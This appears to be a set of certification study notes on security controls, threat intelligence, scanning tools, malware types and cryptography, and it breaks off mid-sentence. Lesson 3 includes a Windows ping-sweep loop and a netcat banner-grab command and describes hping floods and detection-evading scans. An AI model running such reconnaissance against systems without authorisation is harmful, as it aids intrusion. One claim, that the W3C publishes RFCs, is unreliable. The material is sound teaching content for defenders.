Lesson 1: Comparing Security Roles and Security Controls

Information Security
● Non-repudiation means that a subject cannot deny doing something, such as
creating, modifying, or sending a resource.

Cybersecurity Framework
● Information security and cybersecurity tasks can be classified as five functions:
○ Identify—develop security policies and capabilities. Evaluate risks, threats,
and vulnerabilities and recommend security controls to mitigate them.
○ Protect—procure/develop, install, operate, and decommission IT hardware
and software assets with security as an embedded requirement of every
stage of this operations life cycle.
○ Detect—perform ongoing, proactive monitoring to ensure that controls are
effective and capable of protecting against new types of threats.
○ Respond—identify, analyze, contain, and eradicate threats to systems and
data security.
○ Recover—implement cybersecurity resilience to restore systems and data
if other controls are unable to prevent attacks.

Information Security Roles and Responsibilities

● Information Systems Security Officer (ISSO): Organizational role with technical
responsibilities for implementation of security policies, frameworks, and controls.
● Chief Information Security Officer (CISO): Typically the job title of the person with
overall responsibility for information assurance and systems security.
● External responsibility for security (due care or liability) lies mainly with directors
or owners.

Information Security Business Units

● Security Operations Center:
○ A location where security professionals monitor and protect critical
information assets across other business functions, such as finance,
operations, sales/marketing, and so on.
 ● DevSecOps:
○ A combination of software development and systems operations, and
refers to the practice of integrating one discipline with the other.A
combination of software development and systems operations, and refers
to the practice of integrating one discipline with the other.

Security Control Categories

● A security control is something designed to give a system or data asset the
properties of confidentiality, integrity, availability, and non-repudiation.
● Controls can be divided into three broad categories, representing the way the
control is implemented:
○ Technical—the control is implemented as a system (hardware, software,
or firmware).
■ For example, firewalls, antivirus software, and OS access control
models are technical controls.
○ Operational—the control is implemented primarily by people rather than
systems.
■ For example, security guards and training programs.
○ Managerial—the control gives oversight of the information system.
■ Examples could include risk identification or a tool allowing the
evaluation and selection of other security controls.

Security Control Functional Types

● Preventive—the control acts to eliminate or reduce the likelihood that an attack
can succeed.
○ Access control lists (ACL) configured on firewalls and file system
objects are preventative-type controls.
○ Anti-malware software also acts as a preventative control.
● Detective—the control may not prevent or deter access, but it will identify and
record any attempted or successful intrusion.
○ A detective control operates during the progress of an attack.
 ○ Logs provide one of the best examples of detective-type controls.
● Corrective—the control acts to eliminate or reduce the impact of an intrusion
event.
○ A corrective control is used after an attack.
○ A good example is a backup system that can restore data that was
damaged during an intrusion.

NIST Cybersecurity Framework

● A cybersecurity framework (CSF) is a list of activities and objectives
undertaken to mitigate risks.
● The use of a framework allows an organization to make an objective statement of
its current cybersecurity capabilities, identify a target level of capability, and
prioritize investments to achieve that target.

ISO and Cloud Frameworks

● ISO 27k:
○ A comprehensive set of standards for information security, including best
practices for security and risk management, compliance, and technical
implementation.
● ISO 31k:
○ is an overall framework for enterprise risk management (ERM).
○ ERM considers risks and opportunities beyond cybersecurity by including
financial, customer service, competition, and legal liability factors.
● Cloud Security Alliance:
○ Produces various resources to assist cloud service providers (CSP) in
setting up and delivering secure cloud platforms.
○ Security Guidance: a best practice summary analyzing the unique
challenges of cloud environments and how on-premises controls can be
adapted to them.
○ Enterprise Reference Architecture: best practice methodology and tools
for CSPs to use in architecting cloud solutions.
 ○ Cloud Controls Matrix: lists specific controls and assessment guidelines
that should be implemented by CSPs.
● Statements on Standards for Attestation Engagements (SSAE):
○ Audit specifications designed to ensure that cloud/hosting providers meet
professional standards.
○ Service Organization Control (SOC2):
■ Evaluates the internal controls implemented by the service provider
to ensure compliance with Trust Services Criteria (TSC) when
storing and processing customer data.
○ SOC3:
■ a less detailed report certifying compliance with SOC2. SOC3
reports can be freely distributed.

Benchmarks and Secure Configuration Guides

● Center For Internet Security (CIS):
○ A not-for-profit organization (founded partly by SANS). It publishes the
well-known "Top 20 Critical Security Controls" (or system design
recommendations).
● OS/Network Appliance Platform/Vendor-specific Guides:
○ Operating system (OS) best practice configuration lists the settings and
controls that should be applied for a computing platform to work in a
defined role.
● Open Web Application Security Project (OWASP):
○ a not-for-profit, online community that publishes several secure application
development resources, such as the Top 10 list of the most critical
application security risks.

Lesson 2: Explaining Threat Actors and Threat Intelligence

Vulnerability, Threat, and Risk

 ● Vulnerability is a weakness that could be triggered accidentally or exploited
intentionally to cause a security breach.
○ Examples of vulnerabilities include improperly configured or installed
hardware or software.
● Threat is the potential for someone or something to exploit a vulnerability and
breach security.
● Risk is the likelihood and impact (or consequence) of a threat actor exploiting a
vulnerability.

Attributes of Threat Actors

● Intent describes what an attacker hopes to achieve from the attack, while
motivation is the attacker's reason for perpetrating the attack.

Hackers, Script Kiddies, and Hacktivists

● Script Kiddies:
○ someone who uses hacker tools without necessarily understanding how
they work or having the ability to craft new attacks.
● Hacktivists:
○ A threat actor that is motivated by a social issue or political cause.
○ might attempt to obtain and release confidential information to the public
domain.

State Actors and Advanced Persistent Threats

● Advanced Persistent Threat (APT):
○ An attacker's ability to obtain, maintain, and diversify access to network
systems using exploits and malware.
● State actors have been implicated in many attacks, particularly on energy and
health network systems.

Criminal Syndicates and Competitors

 ● A criminal syndicate can operate across the Internet from different jurisdictions
than its victim, increasing the complexity of prosecution.
● it is not inconceivable that a rogue business might use cyber espionage against
its competitors.
○ Such attacks could aim at theft or at disrupting a competitor's business or
damaging their reputation.
● Shadow IT:
○ where users purchase or introduce computer hardware or software to the
workplace without the sanction of the IT department and without going
through a procurement and security analysis process.

Attack Surface and Attack Vectors

● The attack surface is all the points at which a malicious threat actor could try to
exploit a vulnerability.
● Attack Vector: the path that a threat actor uses to gain access to a secure
system.
● Direct Access: this is a type of physical or local attack.
○ The threat actor could exploit an unlocked workstation, use a boot disk to
try to install malicious tools, or steal a device, for example.
● Removable Media:
○ The attacker conceals malware on a USB thumb drive or memory card
and tries to trick employees into connecting the media to a PC, laptop, or
smartphone.
● Email:
○ The attacker sends a malicious file attachment via email, or via any other
communications system that allows attachments.
● Remote and Wireless:
○ The attacker either obtains credentials for a remote access or wireless
connection to the network or cracks the security protocols used for
authentication.
● Supply Chain:
 ○ rather than attack the target directly, a threat actor may seek ways to
infiltrate it via companies in its supply chain.
● Web and Social Media:
○ Malware may be concealed in files attached to posts or presented as
downloads.
● Cloud:
○ Many companies now run part or all of their network services via Internet-
accessible clouds.

Threat Research Sources

● counterintelligence gathering effort in which security companies and researchers
attempt to discover the tactics, techniques, and procedures (TTPs) of modern
cyber adversaries.
● Dark Net:
○ a network established as an overlay to Internet infrastructure by software,
such as The Onion Router (TOR), Freenet, or I2P, that acts to anonymize
usage and prevent a third party from knowing about the existence of the
network or analyzing any activity taking place over the network.
● Dark Web:
○ sites, content, and services accessible only over a dark net.

Threat Intelligence Providers

● Behavioral threat research—narrative commentary describing examples of

attacks and TTPs gathered through primary research sources.
● Reputational threat intelligence—lists of IP addresses and domains associated
with malicious behavior, plus signatures of known file-based malware.
● Threat data—computer data that can correlate events observed on a customer's
own networks and logs with known TTP and threat actor indicators.
● Cyber Threat Intelligence (CTI): The process of investigating, collecting,
analyzing, and disseminating information about emerging threats and threat
sources.
 ● Threat intelligence platforms and feeds are supplied as one of four different
commercial models:
○ Closed/proprietary—the threat research and CTI data is made available
as a paid subscription to a commercial threat intelligence platform.
○ Vendor websites—proprietary threat intelligence is not always provided at
cost.
■ All types of security, hardware, and software vendors make huge
amounts of threat research available via their websites as a general
benefit to their customers.
○ Public/private information sharing centers—in many critical industries,
Information Sharing and Analysis Centers (ISACs) have been set up to
share threat intelligence and promote best practice.
○ Open source intelligence (OSINT)—some companies operate threat
intelligence services on an open-source basis, earning income from
consultancy rather than directly from the platform or research effort.

Other Threat Intelligence Research Options

● Academic journals—results from academic researchers and not-for-profit trade
bodies and associations, such as the IEEE, are published as papers in journals.
● Conferences—security conferences are hosted and sponsored by various
institutions and provide an opportunity for presentations on the latest threats and
technologies.
● Request for Comments (RFC)—when a new technology is accepted as a web
standard, it is published as an RFC by the W3C.
● Social media—companies and individual researchers and practitioners write
informative blogs or social media feeds.

Tactics, Techniques, and Procedures and Indicators of Compromise

● A tactic, technique, or procedure (TTP) is a generalized statement of
adversary behavior.
 ● TTPs categorize behaviors in terms of campaign strategy and approach (tactics),
generalized attack vectors (techniques), and specific intrusion tools and methods
(procedures).
● An indicator of compromise (IoC) is a residual sign that an asset or network
has been successfully attacked or is continuing to be attacked.

Threat Data Feeds

● Threat Data Feed: Signatures and pattern-matching rules supplied to analysis
platforms as an automated feed.
● Structured Threat Information eXpression (STIX):
○ designed to provide a format for this type of automated feed so that
organizations can share CTI.
○ framework describes standard terminology for IoCs and ways of indicating
relationships between them.
● Trusted Automated eXchange of Indicator Information (TAXII):
○ provides a means for transmitting CTI data between servers and clients.
○ Subscribers to the service obtain updates to the data to load into analysis
tools over TAXII.
● Automated Indicator Sharing (AIS):
○ a service offered by the Department of Homeland Security (DHS) for
companies to participate in threat intelligence sharing.
● Threat Maps:
○ an animated graphic showing the source, target, and type of attacks that
have been detected by a CTI platform.
● File/Code Repositories:
○ A file/code repository such as virustotal.com holds signatures of known
malware code.
● Vulnerability Databases and Vulnerability Feeds:
○ Common Vulnerabilities and Exposures (CVE): Scheme for identifying
vulnerabilities developed by MITRE and adopted by NIST.
Artificial Intelligence and Predictive Analysis
● Machine Learning (ML): uses algorithms to parse input data and then develop
strategies for using that data, such as identifying an object as a type, working out
the best next move in a game, and so on.
● One of the goals of using AI-backed threat intelligence is to perform predictive
analysis, or threat forecasting.
○ This means that the system can anticipate a particular type of attack and
possibly the identity of the threat actor before the attack is fully realized.

Lesson 3: Performing Security Assessments

Ipconfig, Ping, and ARP

● Topology discovery (or "footprinting"):
○ means scanning for hosts, IP ranges, and routes between networks to
map out the structure of the target network.
● Ping:
○ You can use ping with a simple script to perform a sweep of all the IP
addresses in a subnet.
○ The following example will scan the 10.1.0.0/24 subnet from a Windows
machine:
■ for /l %i in (1,1,255) do @ping -n 1 -w 100
10.1.0.%i | find /i "reply"

Route and Traceroute

● Pathping:
○ provides statistics for latency and packet loss along a route over a longer
measuring period.
○ pathping is a Windows tool; the equivalent on Linux is mtr.
● In a security context, high latency at the default gateway compared to a baseline
might indicate a man-in-the-middle attack.
 ● High latency on other hops could be a sign of denial of service, or could just
indicate network congestion.

IP Scanners and NMAP

● NMAP:
○ When used without switches like this, the default behavior of Nmap is to
ping and send a TCP ACK packet to ports 80 and 443 to determine
whether a host is present.
○ On a local network segment, Nmap will also perform ARP and ND
(Neighbor Discovery) sweeps.

Service Discovery and NMAP

● Service Discovery:
○ work out which operating systems are in use, which network services each
host is running, and, if possible, which application software is
underpinning those services.
● Service Discovery with Nmap:
○ When Nmap completes a host discovery scan, it will report on the state of
each port scanned for each IP address in the scope.
○ TCP SYN (-sS)—this is a fast technique also referred to as half-open
scanning, as the scanning host requests a connection without
acknowledging it.
■ The target's response to the scan's SYN packet identifies the port
state.
○ UDP scans (-sU)—scan UDP ports. As these do not use ACKs, Nmap
needs to wait for a response or timeout to determine the port state, so
UDP scanning can take a long time.
○ Port range (-p)—by default, Nmap scans 1000 commonly used ports, as
listed in its configuration file.
● Service and Version Detection and OS Fingerprinting with Nmap:
 ○ The detailed analysis of services on a particular host is often called
fingerprinting.
■ This is because each OS or application software that underpins a
network service responds to probes in a unique way.
■ This allows the scanning software to guess at the software name
and version, without having any sort of privileged access to the
host.
● When services are discovered, you can use Nmap with the -sV or -A switch to
probe a host more intensively to discover the following information:
○ Protocol—do not assume that a port is being used for its "well known"
application protocol.
○ Application name and version—the software operating the port, such as
Apache web server or Internet Information Services (IIS) web server.
○ OS type and version—use the -O switch to enable OS fingerprinting (or -A
to use both OS fingerprinting and version discovery).
○ Device type—not all network devices are PCs. Nmap can identify switches
and routers or other types of networked devices, such as NAS boxes,
printers, and webcams.

Netstat and Nslookup

● Netstat:
○ show the state of TCP/UDP ports on the local machine.
○ You may also be able to identify suspect remote connections to services
on the local host or from the host to remote IP addresses.
● Nslookup/dig:
○ query name records for a given domain using a particular DNS resolver.
○ An attacker may test a network to find out if the DNS service is
misconfigured.
■ A misconfigured DNS may allow a zone transfer, which will give the
attacker the complete records of every host in the domain,
revealing a huge amount about the way the network is configured.
Other Reconnaissance and Discovery
● theHarvester:
○ tool for gathering open-source intelligence (OSINT) for a particular domain
or company name.
○ It works by scanning multiple public data sources to gather emails, names,
subdomains, IPs, URLs and other relevant data.
● Dnsenum:
○ While you can use tools such as dig and whois to query name records
and hosting details and to check that external DNS services are not
leaking too much information, a tool such as dnsenum packages a number
of tests into a single query.
● Scanless:
○ Utility that runs port scans through third-party websites to evade detection.
● Curl:
○ A command line client for performing data transfers over many types of
protocol.
○ This tool can be used to submit HTTP GET, POST, and PUT requests as
part of web application vulnerability testing.
● Nessus:
○ One of the best-known commercial vulnerability scanners, produced by
Tenable Network Security.

Packet Capture and TCPDump

● Packet Analysis: refers to deep-down frame-by-frame scrutiny of captured
frames.
● Protocol Analysis: means using statistical tools to analyze a sequence of
packets, or packet trace.
● TCPDump: A command-line packet sniffing utility.

Packet Analysis and Wireshark

● You can either analyze a live capture or open a saved capture (.pcap) file.
Packet Injection and Replay
● Network sniffing software libraries allow frames to be inserted (or injected) into
the network stream.
● Hping:
○ An open-source spoofing tool that provides a penetration tester with the
ability to craft network packets to exploit vulnerable firewalls and IDSs.
○ Perform the following types of test:
■ Host/port detection and firewall testing—like Nmap, hping can be
used to probe IP addresses and TCP/UDP ports for responses.
■ Traceroute—if ICMP is blocked on a local network, hping offers
alternative ways of mapping out network routes.
■ Denial of service (DoS)—hping can be used to perform flood-
based DoS attacks from randomized source IPs.
● Tcprelay:
○ Takes previously captured traffic that has been saved to a .pcap file and
replays it through a network interface.

Exploitation Frameworks
● Remote Access Trojan:
○ malware that gives an adversary the means of remotely accessing the
network.
● Exploitation Framework:
○ Uses the vulnerabilities identified by an automated scanner and launches
scripts or software to attempt to deliver matching exploits.
● Metasploit:
○ A platform for launching modularized attacks against known software
vulnerabilities.
● Sn1per:
○ framework designed for penetration test reporting and evidence gathering.
Netcat
● Computer networking utility for reading and writing raw data over a network
connection, and can be used for port scanning and fingerprinting.
● the following command attempts to connect to the HTTP port on a server and
return any banner by sending the "head" HTTP keyword:
○ echo "head" | nc 10.1.0.1 -v 80

Software Vulnerabilities and Patch Management

● Operating system (OS)—an application exploit will run with the permissions of
the logged on user, which will hopefully be limited.
● Firmware—vulnerabilities can exist in the BIOS/UEFI firmware that controls the
boot process for PCs.
○ There can also be bugs in device firmware, such as network cards and
disk controllers.

Weak Host Configurations

● Default Settings:
○ Relying on the manufacturer default settings when deploying an appliance
or software applications is one example of weak configuration.
● Unsecured Root Accounts:
○ The root account, referred to as the default Administrator account in
Windows or generically as the superuser, has no restrictions set over
system access.
● Open Permissions:
○ refers to provisioning data files or applications without differentiating
access rights for user groups.

Weak Network Configurations

● Open Ports and Services:
 ○ If the service is security-critical (such as a remote administration
interface), restrict endpoints that are allowed to access the service by IP
address or address range.
○ Disable services that are installed by default but that are not needed.
● Unsecure Protocols:
○ An unsecure protocol is one that transfers data as cleartext.
● Weak Encryption:
○ key is generated from a simple password, making it vulnerable to
guessing attempts by brute-force enumeration
○ The algorithm or cipher used for encryption has known weaknesses that
allow brute-force enumeration.
● Errors:
○ Weakly configured applications may display unformatted error messages
under certain conditions.

Impacts from Vulnerabilities

● Data Breach:
○ Where confidential data is read, transferred, modified, or deleted without
authorization.
○ A breach can also be described as a data leak.
● Data Exfiltration:
○ Methods and tools by which an attacker transfers data without
authorization from the victim's systems to an external network or media.
○ Unlike a data breach, a data exfiltration event is always intentional and
malicious.
● Data Loss:
○ Where information becomes unavailable, either permanently or
temporarily.
● Availability Loss Impacts:
○ Availability is sometimes overlooked as a security attribute compared to
confidentiality and integrity.
Third-Party Risks
● Vendor Management:
○ process for selecting supplier companies and evaluating the risks inherent
in relying on a third-party product or service.
○ Larger companies will usually ask vendors to complete a detailed audit
process to ensure that they meet the required standards.
○ System Integration:
■ The process of using components/services from multiple vendors to
implement a business workflow.
● Data Storage:
○ Ensure the same protections for data as though it were stored on-
premises, including authorization and access management and
encryption.
○ Monitor and audit third-party access to data storage to ensure it is being
used only in compliance with data sharing agreements and nondisclosure
agreements.

Security Assessments
● Network reconnaissance and discovery is used to identify hosts, network
topology, and open services/ports, establishing an overall attack surface.
○ Various types of security assessments can be used to test these hosts
and services for vulnerabilities.
● SP 800-115 identifies three principal activities within an assessment:
○ Testing the object under assessment to discover vulnerabilities or to prove
the effectiveness of security controls.
○ Examining assessment objects to understand the security system and
identify any logical weaknesses. This might highlight a lack of security
controls or a common misconfiguration.
○ Interviewing personnel to gather information and probe attitudes toward
and understanding of security.
 ● A vulnerability assessment is an evaluation of a system's security and ability to
meet compliance requirements based on the configuration state of the system.

Vulnerability Scan Types

● Network Vulnerability Scanner:
○ Designed to test network hosts, including client PCs, mobile devices,
servers, routers, and switches.
○ It examines an organization's on-premises systems, applications, and
devices and compares the scan results to configuration templates plus
lists of known vulnerabilities.
○ Typical results from a vulnerability assessment will identify missing
patches, deviations from baseline configuration templates, and other
related vulnerabilities.
○ 1. First phase of scanning might be to run a detection scan to discover
hosts on a particular IP subnet.
○ 2. Next phase of scanning, a target range of hosts is probed to detect
running services, patch level, security configuration and policies, network
shares, unused accounts, weak passwords, antivirus configuration, and so
on.
● Application and Web Application Scanners:
○ A dedicated application scanner is configured with more detailed and
specific scripts to test for known attacks, as well as scanning for missing
patches and weak configurations.
○ The best known class of application scanners are web application
scanners.

Common Vulnerabilities and Exposures

● Vulnerability Feed:
○ A synchronizable list of data and scripts used to check for vulnerabilities.
○ Also referred to as plug-ins or network vulnerability tests (NVTs).
● Secure Content Automation Protocol (SCAP):
 ○ A NIST framework that outlines various accepted practices for automating
vulnerability scanning.
○ SCAP defines ways to compare the actual configuration of a system to a
target-secure baseline plus various systems of common identifiers.
● Common Vulnerabilities and Exposures (CVE):
○ A dictionary of vulnerabilities in published operating systems and
applications software.
○ An identifier in the format: CVE-YYYY-####, where YYYY is the year the
vulnerability was discovered, and #### is at least four digits that indicate
the order in which the vulnerability was discovered.
○ A brief description of the vulnerability.
○ A reference list of URLs that supply more information on the vulnerability.
○ The date the vulnerability entry was created.
● Common Vulnerability Scoring System (CVSS):
○ A risk management approach to quantifying vulnerability data and then
taking into account the degree of risk to different types of systems or
information.

Intrusive Versus Non-Intrusive Scanning

● Non-intrusive (or passive) scanning means analyzing indirect evidence, such
as the types of traffic generated by a device.
○ This type of scanning has the least impact on the network and on hosts,
but is less likely to identify vulnerabilities comprehensively.
○ You might use passive scanning as a technique where active scanning
poses a serious risk to system stability, such as scanning print devices,
VoIP handsets, or embedded systems networks.
● Active scanning means probing the device's configuration using some sort of
network connection with the target.
Credentialed Versus Non-Credentialed Scanning
● A non-credentialed scan is one that proceeds by directing test packets at a host
without being able to log on to the OS or application.
○ The test routines may be able to include things such as using default
passwords for service accounts and device management interfaces, but
they are not given privileged access.
○ most appropriate technique for external assessment of the network
perimeter or when performing web application scanning.
● A credentialed scan is given a user account with logon rights to various hosts,
plus whatever other permissions are appropriate for the testing routines.
○ This sort of test allows much more in-depth analysis, especially in
detecting when applications or security settings may be misconfigured.

False Positives, False Negatives, and Log Review

● A false positive is something that is identified by a scanner or other assessment
tool as being a vulnerability, when in fact it is not.
● false negatives—that is, potential vulnerabilities that are not identified in a scan.
○ This risk can be mitigated somewhat by running repeat scans periodically
● Reviewing related system and network logs can enhance the vulnerability report
validation process.

Configuration Review
● A vulnerability scan assesses the configuration of security controls and
application settings and permissions compared to established benchmarks.
● It might try to identify whether there is a lack of controls that might be considered
necessary or whether there is any misconfiguration of the system that would
make the controls less effective or ineffective.
● Security content automation protocol (SCAP) allows compatible scanners to
determine whether a computer meets a configuration baseline.
● Some scanners measure systems and configuration settings against best
practice frameworks. This is referred to as a compliance scan.
Threat Hunting
● Threat hunting is an assessment technique that utilizes insights gained from
threat intelligence to proactively discover whether there is evidence of TTPs
already present within the network or system.
● Intelligence fusion and threat data—threat hunting can be performed by manual
analysis of network and log data, but this is a very lengthy process.
● Maneuver—when investigating a suspected live threat, you must remember the
adversarial nature of hacking.
○ In threat hunting, the concept that threat actor and defender may use
deception or counter attacking strategies to gain positional advantage.

Rules of Engagement
● Agreeing scope, operational parameters, and reporting requirements for a
penetration test.
● Black Box: consultant is given no privileged information about the network and its
security systems.
● White Box: the consultant is given complete access to information about the
network. This type of test is sometimes conducted as a follow-up to a black box
test to fully evaluate flaws discovered during the black box test.
● Grey Box: the consultant is given some information; typically, this would
resemble the knowledge of junior or non-IT staff to model particular types of
insider threats.
● Bug Bounty: a program operated by a software vendor or website operator where
rewards are given for reporting vulnerabilities.

Passive and Active Reconnaissance

● Passive reconnaissance is not likely to alert the target of the investigation as it
means querying publicly available information.
● Active reconnaissance has more risk of detection. Active techniques might
involve gaining physical access to premises or using scanning tools on the
target's web services and other networks.
 ● Footprinting: using software tools, such as Nmap (nmap.org), to obtain
information about a host or network topology.
● War Driving: The practice of using a Wi-Fi sniffer to detect WLANs and then
either making use of them (if they are open/unsecured) or trying to break into
them (using WEP and WPA cracking tools).
● Drones/unmanned aerial vehicle (UAV): allow the tester to reconnoiter campus
premises, and even to perform war driving from the air (war flying).

Pen Test Attack Life Cycle

● Persistence: the tester's ability to reconnect to the compromised host and use it
as a remote access tool (RAT) or backdoor.
○ To do this, the tester must establish a command and control (C2 or C&C)
network to use to control the compromised host, upload additional attack
tools, and download exfiltrated data.
● Privilege Escalation: persistence is followed by further reconnaissance, where
the pen tester attempts to map out the internal network and discover the services
running on it and accounts configured to access it.
● Lateral Movement: gaining control over other hosts.
○ This is done partly to discover more opportunities to widen access
(harvesting credentials, detecting software vulnerabilities, and gathering
other such "loot"), partly to identify where valuable data assets might be
located, and partly to evade detection.
● Pivoting: If the pen tester achieves a foothold on a perimeter server, a pivot
allows them to bypass a network boundary and compromise servers on an inside
network.
○ A pivot is normally accomplished using remote access and tunneling
protocols, such as Secure Shell (SSH), virtual private networking (VPN),
or remote desktop.

Lesson 4: Identifying Social Engineering and Malware

Social Engineering
● It can also be referred to as "hacking the human.”

Phishing, Whaling, and Vishing

● Vishing—a phishing attack conducted through a voice channel (telephone or
VoIP, for instance).
● Whaling—a spear phishing attack directed specifically against upper levels of
management in the organization (CEOs and other "big fish").

● SMiShing—this refers to using short message service (SMS) text

communications as the vector.

Hoaxes, Spam and Prepending

● Hoaxes:
○ An email alert or web pop-up will claim to have identified some sort of
security problem, such as virus infection, and offer a tool to fix the
problem.
● prepending: means adding text that appears to have been generated by the mail
system.
○ For example, an attacker may add "RE:" to the subject line to make it
appear as though the message is a reply or may add something like
"MAILSAFE: PASSED" to make it appear as though a message has been
scanned and accepted by some security software.

Pharming and Credential Harvesting

● Pharming:
○ A passive means of redirecting users from a legitimate website to a
malicious one.
○ Pharming relies on corrupting the way the victim's computer performs
Internet name resolution, so that they are redirected from the genuine site
to the malicious one.
 ● Typosquatting:
○ This means that the threat actor registers a domain name that is very
similar to a real one, such as connptia.org, hoping that users will not
notice the difference.
● Watering Hole Attack:
○ An attack in which an attacker targets specific groups or organizations,
discovers which websites they frequent, and injects malicious code into
those sites.
● Credential Harvesting:
○ Social engineering techniques for gathering valid credentials to use to gain
unauthorized access.
○ The attacker may have more interest in selling the database of captured
logins than trying to exploit them directly.
○ Such attacks will use an alarming message such as "Your account is
being used to host child pornography" or "There is a problem with your
account storage" and a link to a pharming site embroidered with the logos
of a legitimate service provider, such as Google, Microsoft, Facebook, or
Twitter.

Influence Campaigns

● A major program launched by an adversary with a high level of capability, such

as a nation-state actor, terrorist group, or hacktivist group.
● The goal of an influence campaign is to shift public opinion on some topic.

Malware Classification

● Potentially unwanted programs (PUPs)/Potentially unwanted applications

(PUAs)—software installed alongside a package selected by the user or perhaps
bundled with a new computer system.

Computer Viruses
 ● Non-resident/file infector—the virus is contained within a host executable file and
runs with the host process.
○ The virus will try to infect other process images on persistent storage and
perform other payload actions.
● Memory resident—when the host file is executed, the virus creates a new
process for itself in memory.
○ The malicious process remains in memory, even if the host process is
terminated.
● Boot—the virus code is written to the disk boot sector or the partition table of a
fixed disk or USB media, and executes as a memory resident process when the
OS starts or the media is attached to the computer
● Script and macro viruses—the malware uses the programming features available
in local scripting engines for the OS and/or browser, such as PowerShell.
● Multipartite: used for viruses that use multiple vectors and polymorphic for
viruses that can dynamically change or obfuscate their code to evade detection.

Computer Worms and Fileless Malware

● worm is memory-resident malware that can run without user intervention and
replicate over network resources.
○ a worm can execute by exploiting a vulnerability in a process when the
user browses a website, runs a vulnerable server application, or is
connected to an infected file share.
● Fileless Malware:
○ Fileless malware does not write its code to disk.
■ The malware uses memory resident techniques to run in its own
process, within a host process or dynamic link library (DLL).
○ Fileless malware uses lightweight shellcode to achieve a backdoor
mechanism on the host.
■ Shellcode: Lightweight block of malicious code that exploits a
software vulnerability to gain initial access to a victim system.
 ○ Fileless malware may use "live off the land" techniques rather than
compiled executables to evade detection.
■ This means that the malware code uses legitimate system scripting
tools, notably PowerShell and Windows Management
Instrumentation (WMI), to execute payload actions.

Spyware and Keyloggers

● Tracking cookies—A cookie is a plaintext file, not malware, but if permitted by

browser settings, third-party cookies can be used to record pages visited, the
user's IP address and various other metadata, such as search queries and
information about the browser software.
● Adware—this is a class of PUP/grayware that performs browser
reconfigurations, such as allowing tracking cookies, changing default search
providers, opening sponsor's pages at startup, adding bookmarks, and so on.
● Spyware—this is malware that can perform adware-like tracking, but also
monitor local application activity, take screenshots, and activate recording
devices, such as a microphone or webcam.
● A keylogger is spyware that actively attempts to steal confidential information by
recording keystrokes.

Backdoors and Remote Access Trojans

● Any type of access method to a host that circumvents the usual authentication
method and gives the remote user administrative control can be referred to as a
backdoor.
● A remote access trojan (RAT) is backdoor malware that mimics the functionality
of legitimate remote control programs, but is designed specifically to operate
covertly.
● A bot is an automated script or tool that performs some malicious activity.
● A group of bots that are all under the control of the same malware instance can
be manipulated as a botnet by the herder program.
 ● Command and Control (C2 or C&C): An infrastructure of hosts and services with
which attackers direct, distribute, and control malware over botnets.
● Covert Channel: A type of attack that subverts network security systems and
policies to transfer data without authorization or detection.
○ Historically, the Internet relay chat (IRC) protocol was popular.

Rootkits

● A class of malware that modifies system files, often at the kernel level, to conceal
its presence.
● Running as root has unrestricted access to everything from the root of the file
system down.

Ransomware, Crypto-Malware, and Logic Bombs

● Logic Bomb: A malicious program or script that is set to run under particular
circumstances or in response to a defined event.

Malware Indicators

● Antivirus Notifications:
○ Endpoint Protection Platforms (EPPs): A software agent and monitoring
system that performs multiple security tasks.
○ User and Entity Behavior Analytics (UEBA): A system that can provide
automated identification of suspicious activity by user accounts and
computer hosts.
● Resource Consumption:
○ Abnormal resource consumption can be detected using a performance
monitor, Task Manager, or the top Linux utility.
○ Also, it is only really poorly written malware or malware that performs
intensive operations (botnet DDoS, cryptojacking, and crypto ransomware,
for instance) that displays this behavior.
 ● File System:
○ While fileless malware is certainly prevalent, file system change or
anomaly analysis is still necessary.
○ A computer's file system stores a great deal of useful metadata about
when files were created, accessed, or modified.
● Sandbox Execution:
○ A sandbox is a system configured to be completely isolated from its host
so that the malware cannot "break out."
○ Cuckoo is packaged software that aims to provide a turnkey sandbox
solution, though the project is inactive at time of writing.

Process Analysis

● Abnormal Process Behavior: Indicators that a legitimate OS process has been

corrupted with malicious code for the purpose of damaging or compromising the
system.
● Sysinternals: A suite of tools designed to assist with troubleshooting issues with
Windows.
○ The Sysinternals tool Process Explorer is an enhanced version of Task
Manager.

Lesson 5: Summarizing Basic Cryptographic Concepts

Cryptographic Concepts

● Cryptography (literally meaning "secret writing") has been around for thousands
of years. It is the art of making information secure by encoding it.
● The following terminology is used to discuss cryptography:
○ Plaintext (or cleartext)—an unencrypted message.
○ Ciphertext—an encrypted message.
○ Cipher—the process (or algorithm) used to encrypt and decrypt a
message.
 ○ Cryptanalysis—the art of cracking cryptographic systems.

Hashing Algorithms
● A cryptographic hashing algorithm produces a fixed length string from an input
plaintext that can be of any length.
● The output can be referred to as a checksum, message digest, or hash.
● A hashing algorithm is used to prove integrity.
● As well as comparing password values, a hash of a file can be used to verify the
integrity of that file after transfer.

Encryption Ciphers and Keys

● While a hash function can be used to prove the integrity of data, it cannot be
used to store or transmit data.
● Substitution and Transposition Ciphers:
○ A substitution cipher involves replacing units (a letter or blocks of letters)
in the plaintext with different ciphertext.
■ Simple substitution ciphers rotate or scramble letters of the
alphabet.
○ A transposition cipher stays the same in plaintext and ciphertext, but their
order is changed, according to some mechanism.
● Keys and Secret Ciphers:
○ The key is important because it means that even if the cipher method is
known, a message still cannot be decrypted without knowledge of the
specific key.

Symmetric Encryption
● Symmetric encryption is very fast. It is used for bulk encryption of large amounts
of data.
● The main problem is secure distribution and storage of the key, or the exact
means by which Alice and Bob "meet" to agree on the key.
Steam and Block Ciphers
● In a stream cipher, each byte or bit of data in the plaintext is encrypted one at a
time.
○ The plaintext is combined with a separate randomly generated message,
calculated from the key and an initialization vector (IV).
■ The IV ensures the key produces a unique ciphertext from the
same plaintext.
○ The keystream must be unique, so an IV must not be reused with the
same key.
● In a block cipher, the plaintext is divided into equal-size blocks (usually 128-bit).
○ If there is not enough data in the plaintext, it is padded to the correct size
using some string defined in the algorithm.v
○ The Advanced Encryption Standard (AES) is the default symmetric
encryption cipher for most products.
● Recommendations on minimum key length for any given algorithm are made by
identifying whether the algorithm is vulnerable to cryptanalysis techniques and by
the length of time it would take to "brute force" the key, given current processing
resources.

Asymmetric Encryption
● With an asymmetric cipher, operations are performed by two different but related
public and private keys in a key pair.
● The message cannot be larger than the key size. Where a large amount of data
is being encrypted on disk or transported over a network, asymmetric encryption
is inefficient.

Public Key Cryptography Algorithms

● Asymmetric encryption is often referred to as public key cryptography.
● Many public key cryptography products are based on the RSA algorithm.
○ The RSA algorithm provides the mathematical properties for deriving key
pairs and performing the encryption and decryption operations.
 ○ This type of algorithm is called a trapdoor function, because it is easy to
perform using the public key, but difficult to reverse without knowing the
private key.
● Elliptic curve cryptography (ECC) is another type of trapdoor function that can
